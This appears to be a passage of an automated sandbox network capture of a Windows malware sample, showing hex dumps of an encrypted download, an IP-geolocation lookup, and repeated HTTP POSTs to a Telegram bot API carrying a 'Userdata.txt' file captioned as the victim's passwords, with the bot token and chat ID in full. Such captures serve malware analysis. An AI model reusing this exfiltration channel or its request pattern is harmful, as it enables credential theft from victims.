                                                                                                                  2025-01-10 21:40:13 UTC4941INData Raw: c5 86 f2 a6 37 a2 99 52 10 83 27 9c 84 27 6a 4a ce 01 5a 65 6b 67 16 eb c6 15 92 de 4b 78 7c 5e 23 d7 0e 98 5c 06 42 f0 ec a9 3c 15 99 46 f5 36 89 e8 6a 26 87 ba 93 e3 e0 bd 6c 38 41 20 49 f9 2a dd 96 2e 02 86 7e de bc e3 9c bd b6 0e 87 92 38 62 d1 4d ea d2 75 c3 97 10 d4 8a 29 5e 2b 28 bb c8 8e 46 43 53 67 c7 a5 98 17 b3 28 e1 79 e9 fa f3 16 a2 ab 20 88 90 35 d8 cb 8b 9c e0 80 fd 98 dc 6d bc ef f7 5c 8d 6f b8 b0 a7 9b 35 49 a4 fe 94 ab 24 e2 51 92 69 d3 fa 56 32 7a 7d 4c 5f 38 50 c0 bc 21 f6 e0 03 82 12 e9 b7 65 db 2f 11 74 ca 06 78 fc bc ad d4 b3 0e bc 6b 7b fd ad cd 54 a4 5b 40 cd de 0a 78 13 53 59 a6 4a 5d f4 e8 36 1f de 60 16 c8 a9 dc 29 41 80 eb 7f c3 19 d5 cf 7b bb cf 21 34 b0 57 d5 f8 f0 20 05 86 b3 83 11 d2 1b 11 7c 07 b1 60 89 8f c3 73 58 eb cf
                                                                                                                  Data Ascii: 7R''jJZekgKx|^#\B<F6j&l8A I*.~8bMu)^+(FCSg(y 5m\o5I$QiV2z}L_8P!e/txk{T[@xSYJ]6`)A{!4W |`sX
                                                                                                                  2025-01-10 21:40:13 UTC4815INData Raw: 7c e6 7a ec 22 47 0a c1 a3 d2 1d 51 57 0c 87 0a 78 8a 80 1d e3 9d 86 eb 05 47 64 76 df f7 47 4d 71 78 02 f2 79 96 68 3f 89 17 d6 0c 7c b0 06 4d 3e 53 4d 87 18 5b f3 96 b3 76 7b e1 64 4b f4 27 c4 82 a2 3d 89 e7 f5 62 e0 7c e7 be 60 64 d6 d4 03 b0 ca f1 03 20 0e 1f fe db fb cd 83 67 6c c6 c8 1f 72 a1 e9 ab 27 a5 28 21 08 1c 62 fd f4 5c 45 c3 41 d4 53 0a c0 16 13 4f fc 57 b8 88 af 78 52 41 49 51 8f 55 78 4d 5e bb ee db 79 9c 68 fa 5f ce 6c e2 52 74 ec f3 e3 2e 82 ac a2 dc d1 36 50 85 51 f6 f4 0c 91 ac 71 15 2b 96 d8 ae 32 22 47 b7 08 38 3f c1 b4 85 f8 d0 bb a8 f3 38 db b5 e5 13 d2 8a 0b 49 94 c8 43 9c 50 bc 26 cb 47 96 ae 32 9d 5b fb ca b3 0c 5a f8 0d ea 65 40 b0 80 aa e5 2f e4 00 94 29 52 bd 6b bf a7 da 06 83 82 df 62 c6 c7 07 26 6d a5 f3 dd 16 a7 be 64 4a
                                                                                                                  Data Ascii: |z"GQWxGdvGMqxyh?|M>SM[v{dK'=b|`d glr'(!b\EASOWxRAIQUxM^yh_lRt.6PQq+2"G8?8ICP&G2[Ze@/)Rkb&mdJ
                                                                                                                  2025-01-10 21:40:13 UTC1323INData Raw: e2 52 7a 9c 81 93 65 f2 84 90 f4 00 30 3f b2 2c bc fe 24 d2 a9 67 1d 3f 4e d8 ae 3c 20 2d fa 7a 3c 3c e9 16 fb e5 da bb ae 84 24 b9 c8 d8 3b 95 8e 09 41 80 16 43 9c 5e 94 89 d9 47 9c d7 0d 09 5b ff c0 a0 21 4b fe 62 6c 55 42 ba 0b ad 8a b9 c0 00 9e 38 2c 9f 10 f9 a3 a9 95 fd d1 d5 71 c4 91 48 26 6d ab 8b 47 0e a3 df 76 4e a1 7f dd 7b b3 9c 4e 7e fe e5 b8 fa 04 b2 e6 1e 7f fa b3 e0 89 b6 25 89 f1 f1 1b 0c 78 fc 9f 60 46 f5 ca b1 aa 13 1d 26 ab a8 36 24 31 95 d0 60 81 26 b1 e1 73 c5 f2 9f de 0e d7 6c ae 58 f7 78 97 85 91 ba 39 a8 3a 3d be d2 b8 9e 03 44 fa b1 d3 58 64 01 93 23 95 e9 6c 05 cd 9d e9 45 67 31 67 82 d4 45 f8 fd 39 eb 27 4e ca 4d 32 65 ea 96 be 2d 55 21 8a 54 19 87 7f 2e b1 97 41 03 94 70 f4 9e 26 7f 0d 72 ae 49 16 ce 83 71 b1 3e a9 63 66 60 e5
                                                                                                                  Data Ascii: Rze0?,$g?N< -z<<$;AC^G[!KblUB8,qH&mGvN{N~%x`F&6$1`&slXx9:=DXd#lEg1gE9'NM2e-U!T.Ap&rIq>cf`
                                                                                                                  2025-01-10 21:40:13 UTC1390INData Raw: 23 09 a6 e8 1c 0f 89 d7 d8 ac f6 0a 8f 74 e2 72 cf 73 b4 a3 3a cb f6 2e b8 c5 1c 97 14 34 c7 ec d3 28 c2 0c 5b 2a fa 25 6c 05 cb 3d b7 15 15 51 76 fc f7 e7 d0 57 11 bf 2d 5d c4 3e 34 76 ed 83 a8 05 70 6d f1 18 13 07 74 06 62 93 41 1b 96 58 29 b4 26 75 05 47 b5 4c 11 5e 5d 7e 86 3c 57 64 6a 62 9b 7e 05 7a e0 70 f3 fd dd 5e 22 fa df 72 32 b4 c7 67 eb c3 38 16 1c 1a e6 97 90 cb 3e 1c 1a 6b f2 35 6d 46 bc 58 bd 80 52 51 55 0d cd 33 d6 f4 c6 a0 dd bf 0a d6 8e 37 f2 49 e3 28 da 5e 50 be f7 8d 72 5a c3 89 ab 54 ef f7 29 ae 2b 0d 5b 9c 81 41 e7 9e bb 22 37 91 fe d7 69 db 68 62 47 64 81 b6 ee 9c 80 fa 1a f9 ac df 36 04 81 aa 13 a5 1b 78 60 1f 72 50 54 46 74 07 3e 7d 5b 22 ab 26 7b d1 51 28 d1 93 b0 44 11 90 11 83 18 76 55 56 52 55 f3 60 ba cd 67 47 93 ad 60 66 75
                                                                                                                  Data Ascii: #trs:.4([*%l=QvW-]>4vpmtbAX)&uGL^]~<Wdjb~zp^"r2g8>k5mFXRQU37I(^PrZT)+[A"7ihbGd6x`rPTFt>}["&{Q(DvUVRU`gG`fu
                                                                                                                  2025-01-10 21:40:13 UTC1390INData Raw: 34 ab 5c 07 02 47 3b d6 09 7c 5e 6f 4e 00 8f 03 09 2b 52 5c 34 92 cc 54 cd 6d ef a5 bb 0f b6 64 f4 49 60 86 00 2e 22 f5 76 6e 57 3d d1 3b 15 24 90 0e 2f 4c f8 d8 a0 f6 ee 54 3a 3b 63 2b 2d 82 fa a7 94 5b dc f5 54 0b 20 fd 6a cf b2 c9 2f 04 ac fd a9 19 98 77 96 42 11 13 7f 30 46 b3 ab 28 83 56 a5 3d bd b3 48 7d e6 b7 dc 29 0f c3 b4 85 e5 d8 55 c5 b7 fc 46 46 4e 1d 71 f7 58 79 4a 28 25 4a 77 e2 c2 a7 c4 2e b8 f2 7a 6b d9 9d 91 27 5f a1 7a c9 af 44 dd 32 ef 06 42 81 83 86 c3 a4 be 78 db 01 c4 b1 9e 3b fc 93 e2 11 a3 5c 2c 0d 31 bb 72 52 47 82 e5 9b 77 e4 9e 75 c5 68 50 9d 9d 99 e7 83 49 c5 2d e8 7d c1 1d 53 56 ed 3b 83 74 53 29 ea 6e d3 b8 d9 03 5b 74 1d 35 6f bb 4c ff 8a 3e dc fe 18 c3 d6 85 0c 3d 03 ae 58 f4 50 f9 8d 8d a2 6c 0b 0e eb 89 b8 ee 44 a7 95 56
                                                                                                                  Data Ascii: 4\G;|^oN+R\4TmdI`."vnW=;$/LT:;c+-[T j/wB0F(V=H})UFFNqXyJ(%Jw.zk'_zD2Bx;\,1rRGwuhPI-}SV;tS)n[t5oL>=XPlDV
                                                                                                                  2025-01-10 21:40:13 UTC1390INData Raw: 6f 3c a6 3a c1 e7 2c d7 c8 81 19 3e c6 a8 72 fe 78 ac bd 8b a8 6d 1c 7c 09 bd b8 9e 46 87 86 32 3a 7c 20 3e 8c 77 74 ce a9 a3 a1 4a da 93 6d 02 73 4e 13 86 2e e6 38 4a e3 e8 14 ee bd 7f e5 9d 6a 0e e2 a8 d7 9b b2 41 0a 61 de 2f 7c e2 36 21 00 6a a9 d8 7a 33 ee c9 2a 45 c3 b6 c1 e9 4a a1 97 d4 e6 04 4e dc 50 8a 62 3b e6 a2 9a b6 17 8d e7 41 a4 5c 5f 26 80 ca 83 20 16 e1 f4 34 be c3 11 08 6b 0e 92 44 b3 ea 12 1b e3 5b 1c e0 ac 21 3b 74 df 02 12 13 de e2 56 b6 7e 8d 5f f6 e9 5f c0 78 c1 9f ec 0f a8 0d 4f 3b 2b 89 6c 15 48 01 98 e7 6e a1 ea 40 cf 07 a7 35 c4 52 43 e7 56 c1 ac 99 af d7 60 9c 88 55 c0 4c 1a 33 98 cf 52 49 10 08 86 06 2e 0b 86 a2 d6 36 8a 87 67 5e 2b 90 44 0d 3b d1 4d eb c1 72 cb cc 01 d3 9c 21 d0 42 33 61 e0 e8 46 43 59 67 c7 b4 9f 03 a5 00 06
                                                                                                                  Data Ascii: o<:,>rxm|F2:| >wtJmsN.8JjAa/|6!jz3*EJNPb;A\_& 4kD[!;tV~__xO;+lHn@5RCV`UL3RI.6g^+D;Mr!B3aFCYg
                                                                                                                  2025-01-10 21:40:13 UTC1390INData Raw: 87 92 80 26 d1 4d eb c9 45 c7 d7 6c d5 8a 29 6d 2b 28 aa c8 91 5a 6b 8b 67 c7 af ea 37 ae 28 91 51 a7 fa f3 1c a8 ab 26 a0 68 35 d8 c1 80 1b d9 c6 fc 96 c3 d1 c1 38 43 55 46 42 08 c3 b1 4a 14 6d a3 45 e7 8b 52 b6 36 9a c8 b2 97 70 46 c1 00 24 26 5f 77 9a ce 00 84 95 65 b3 7c f5 ff 3d 94 0c 5e cc a5 62 1b df b9 b1 d9 e5 70 a0 6b 0b 92 78 cd 04 e7 48 44 89 ce 0e 0a 38 75 2c 67 25 88 f4 e8 30 0c db 71 f3 e0 38 dd 22 46 c3 e3 6e ad 34 96 c9 5b b8 ce 21 3e df 53 0a 7d fb 4f 00 a7 b3 89 39 e6 1a 11 7a 14 f8 71 80 bb 3d 72 4b e3 de 0c d9 75 b9 51 ea 46 21 26 e0 75 61 bc ab 75 ff 8d 50 23 ec 77 ef 3b 58 2a da ca bd 91 42 52 06 87 03 3c dc 80 35 43 9d f8 f3 0d 56 67 2c c8 eb 47 37 1e 73 0e f2 76 d5 30 36 e6 1c fe b0 76 b0 dc 80 28 76 74 b0 6a b9 fc 85 c7 60 7b 32
                                                                                                                  Data Ascii: &MEl)m+(Zkg7(Q&h58CUFBJmER6pF$&_we|=^bpkxHD8u,g%0q8"Fn4[!>S}O9zq=rKuQF!&uauP#w;X*BR<5CVg,G7sv06v(vtj`{2
                                                                                                                  2025-01-10 21:40:13 UTC1390INData Raw: 52 e4 42 56 74 8e 9d f2 70 bc 7c 3e f7 1e fa 4f 70 98 d9 92 2d 7c 0a b0 19 5b f3 ea b2 77 53 b9 4c df fe fa d5 93 ab 2c 80 f3 0b 1d eb 76 f6 b0 04 cc dc c7 78 b7 e9 5c 15 08 ae 09 00 d0 f9 cd fd 3d 55 dd c3 0e 7b 89 0f 27 27 a3 31 37 0e 0d 64 a8 ca 5c 6d 6d 32 59 59 02 db 7e ef d3 e0 5d c8 f6 7c 17 dd 47 26 04 f1 74 72 65 e6 d4 7e dd 6a 93 68 fa 5d 94 1f e7 52 0e 88 ab 69 2e f2 8e 82 22 d2 21 3a ca b3 f3 fe 54 c0 84 f0 1f 44 0e ce 50 3b 7d 45 bd 6b 30 14 8c d9 76 da d0 bb ad a4 bc a2 53 81 3b e5 28 2e 54 f2 f9 66 84 28 90 4d d9 37 34 8f 58 18 5f 59 e5 ba 79 0d eb 62 0f c7 65 a1 80 a8 28 9c f8 72 b0 09 2c ed c9 97 03 a9 91 89 91 d8 0f c1 b9 1c 22 7c ac a9 0f 1d a7 c4 f2 6d ac 7d a2 3d b3 8d 4d 41 fb f6 bf e1 03 a3 e0 22 e4 4e 4c 1f 8d c8 a8 99 d4 d3 00 58
                                                                                                                  Data Ascii: RBVtp|>Op-|[wSL,vx\=U{''17d\mm2YY~]|G&tre~jh]Ri."!:TDP;}Ek0vS;(.Tf(M74X_Yybe(r,"|m}=MA"NLX
                                                                                                                  2025-01-10 21:40:13 UTC1390INData Raw: a7 c4 64 9c af 6c a3 4f 51 99 4a 26 3b cd 39 f0 04 b8 f0 e2 07 ef a0 ec 9c c4 5a c4 ec 76 0c 58 78 fd b0 7d 33 00 db a0 df 9d 35 33 d9 40 13 3c 47 91 16 60 f1 8e 94 f8 62 c3 2b f2 c4 7c 95 07 fd 28 55 57 a4 c0 94 18 16 b8 40 e5 9a c3 ce 10 26 e6 81 f9 d9 4b 6d 57 4f 23 95 e7 7d 08 e5 d1 92 09 6d b1 6c fc 87 41 f8 f7 00 b8 30 98 d3 47 2a 71 fc 81 87 e1 a6 dc 0e 18 19 59 6b 23 4a a4 41 09 9e 63 fa b4 0e 2d 16 42 ae 97 3c cf a9 30 88 3e a9 72 66 62 9b 76 6a 7b e0 27 f8 fd 01 34 08 f8 df 62 18 b5 d7 23 eb c1 39 10 2c 64 71 eb 9e cb 3e 2f 1a 70 d3 3f 72 10 97 80 bd ac 58 23 77 2e be 9a fe ba cc ab cd 38 35 d0 a6 ce d7 5f 9b e9 c8 67 66 1d d2 9a 06 cf 01 89 db f0 c6 e7 29 f6 21 0d 5b 51 76 58 95 86 8b 2a 28 e0 f2 c3 7c c8 a8 fc d0 72 92 b0 f3 9d ff 24 1a f1 b7
                                                                                                                  Data Ascii: dlOQJ&;9ZvXx}353@<G`b+|(UW@&KmWO#}mlA0G*qYk#JAc-B<0>rfbvj{'4b#9,dq>/p?rX#w.85_gf)![QvX*(|r$
                                                                                                                  2025-01-10 21:40:13 UTC1390INData Raw: e5 48 a2 3d 25 79 3e a4 52 4b 80 ad 08 06 2f f2 c3 7a df 72 ef c5 64 81 b7 9c 8b fe 24 70 f8 a6 ad 1c 12 81 da 38 7a 1b 79 71 8d 53 47 56 99 74 07 07 0f b6 25 ab 49 08 26 89 28 db 3b e7 c5 4a 4e 61 ab 5c 04 b1 4b 58 25 9a 97 42 cd 6d ef bd b3 27 fe 74 fa 3b 36 ef d7 5e 4d 18 7a 66 2f 70 1b 54 8a 4b 42 04 3c 5a cf de bd 71 f4 54 4c 04 f7 38 2b 9e fa b1 bd 5d c4 86 a4 03 31 f0 0b b5 bf db 30 9a 79 fd a3 a8 86 6c 96 56 74 b7 74 e6 bb 85 7e 28 82 43 a2 2f a6 b7 3d ed 7f ab ac 4a 76 07 a6 94 f7 dd 41 c7 dd 26 d5 46 44 3d 73 eb 5f e0 46 bb 23 62 74 1d c3 be bc 3b ae e1 69 15 c5 b0 97 3b 64 2d 7a e2 ac 57 c3 30 fe 12 ad 93 87 56 c1 b4 be 95 c1 2a f9 a2 95 17 fb af 59 0a 32 49 1d 39 49 f5 66 43 56 02 f3 cc cd ea 8f 67 c7 76 c1 82 a0 4c c6 95 9f 6e 06 e9 61 da 10
                                                                                                                  Data Ascii: H=%y>RK/zrd$p8zyqSGVt%I&(;JNa\KX%Bm't;6^Mzf/pTKB<ZqTL8+]10ylVtt~(C/=JvA&FD=s_F#bt;i;d-zW0V*Y2I9IfCVgvLna


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.649988104.21.32.14436068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 21:40:22 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 21:40:22 UTC850INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:22 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1860011
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1UO8Ft9LYaCLMiIQ8IlNTXVo5RQpC2NsBQ6IBFb1WOLzRIQ4YqzdMBS7OiIpe1EYvbr57EL%2BkXJKILPUM62VhhChGfonnEeUb2Rx7akSZs6poDwDmDinZIxPh6Oqwagm0OwF21Mh"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fffd3378ea24344-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1695&rtt_var=652&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1656267&cwnd=47&unsent_bytes=0&cid=2713b4f30a3fef4b&ts=160&x=0"
                                                                                                                  2025-01-10 21:40:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.649989149.154.167.2204436068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 21:40:30 UTC298OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary================8dd31957da5bf21
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 1090
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 21:40:30 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 35 37 64 61 35 62 66 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: --===============8dd31957da5bf21Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                  2025-01-10 21:40:30 UTC388INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:30 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 538
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-10 21:40:30 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 32 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":44775,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736545230,"document":{"file_name":"U


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.649991149.154.167.2204436068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 21:40:31 UTC298OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary================8dd31a904c55497
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 1090
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 21:40:31 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 39 30 34 63 35 35 34 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: --===============8dd31a904c55497Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                  2025-01-10 21:40:32 UTC388INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:32 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 538
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-10 21:40:32 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 32 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":44776,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736545232,"document":{"file_name":"U


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.649993149.154.167.2204436068C:\Users\user\Desktop\9Yn5tjyOgT.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 21:40:33 UTC274OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary================8dd31bb19a83e14
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 1090
                                                                                                                  2025-01-10 21:40:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 62 31 39 61 38 33 65 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: --===============8dd31bb19a83e14Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                  2025-01-10 21:40:33 UTC388INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 10 Jan 2025 21:40:33 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 539
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
